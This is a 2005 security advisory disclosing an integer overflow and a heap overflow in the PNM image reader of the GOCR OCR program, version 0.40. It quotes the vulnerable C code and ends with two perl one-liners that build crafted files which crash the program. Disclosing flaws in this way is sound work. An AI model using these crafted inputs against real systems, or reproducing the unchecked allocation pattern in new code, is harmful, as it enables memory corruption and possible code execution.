[Overflow.pl] GOCR - Multiple vulnerabilities
Overflow.pl Security Advisory #1
GOCR - Multiple vulnerabilities
URL: http://www.overflow.pl/adv/gocr.txt
Date: 04.05.2005
1. Background
GOCR is an OCR (Optical Character Recognition) program, developed under the GNU
Public License. It converts scanned images of text back to text files. Joerg
Schulenburg started the program, and now leads a team of developers.
GOCR can be used with different front-ends, which makes it very easy to port to
different OSes and architectures. It can open many different image formats, and
its quality have been improving in a daily basis.
http://jocr.sourceforge.net/index.html
2. Description
In my opinion GOCR should be rewritten, becouse there are many implementation
and security problems. I only research function that reads PNM image file. In
two version of it (using netpbm library and don`t), exists critical security
vulnerabilities. Local exploitation of heap overflow and integer overflow in
GOCR, could allow an attacker to execute arbitrary code.
2.1. Integer overflow in readpgm() that used netpbm library.
An integer overflow leading to heap overflow, exists when GOCR read special
crafted PNM file. The vulnerable code is in function readpgm() that use netpbm
library:
src/pnm.c:
...
/*
for simplicity only PAM of netpbm is used, the older formats
PBM, PGM and PPM can be handled implicitly by PAM routines (js05)
*/
#ifdef HAVE_PAM_H
void readpgm(char *name, pix * p, int vvv) {
...
/* read pgm */
pnm_readpaminit(fp, &inpam, sizeof(inpam));
p->x = inpam.width;
p->y = inpam.height;
if ( !(p->p = (unsigned char *)malloc(p->x*p->y)) )
F1("Error at malloc: p->p: %d bytes", p->x*p->y);
...
for ( i=0; i < inpam.height; i++ ) {
pnm_readpamrow(&inpam, tuplerow);
for ( j = 0; j < inpam.width; j++ ) {
...
p->p[i*inpam.width+j] = sample;
...
}
}
}
If result of p->x*p->y overflow integer variable, we can allocate not enough
memory for image buffer. For example, if height of image is 4 and width is
1073741825, we allocate only 4 bytes for it. This vulnerability lead to heap
overflow on reading base data of pmn file.
2.2 Heap Overflow in readpgm() that don`t use netpbm library.
A heap overflow exists when GOCR read special craftem plain PNM file (P3
format). The vulnerable code is in function readpgm() that NOT used netpbm
library:
src/pnm.c:
/*
if PAM not installed, here is the fallback routine,
which is not so powerful
*/
void readpgm(char *name,pix *p,int vvv){
...
pic=(unsigned char *)malloc( nx*ny );
...
if( c2=='3' )for(mod=k=j=i=0;i<nx*ny*3 && !feof(f1);){
c1=read_char(f1);
if( !isdigit(c1) ) { if( !isspace(c1) )F0("unexpected char");
if(1&mod) { k+=j; if(mod==5){ pic[i]=k/3; i++; }
j=0; mod=(mod+1)%6; } }
else { j=j*10+c1-'0'; if(!(mod&1)) mod++; };
}
...
The array pic is only nx*ny elements large, but loop end when "i<nx*ny*3 &&
!feof(f1)", so if file have more bytes, pic array could be overflowed.
3. Detection
Current gocr version (0.40) is vulnerable. Probably older too.
4. PoC
Interger overflow:
bash-2.05b$ perl -e 'print "P3\n4 1073741825\n255\n"; print "0 "x1024' >
vuln.pnm bash-2.05b$ ./gocr vuln.pnm
Segmentation fault (core dumped)
Heap overflow:
bash-2.05b$ perl -e 'print "P3\n10 10\n255\n"; print "0 "x1024' > vuln.pnm
bash-2.05b$ ./gocr vuln.pnm
Segmentation fault (core dumped)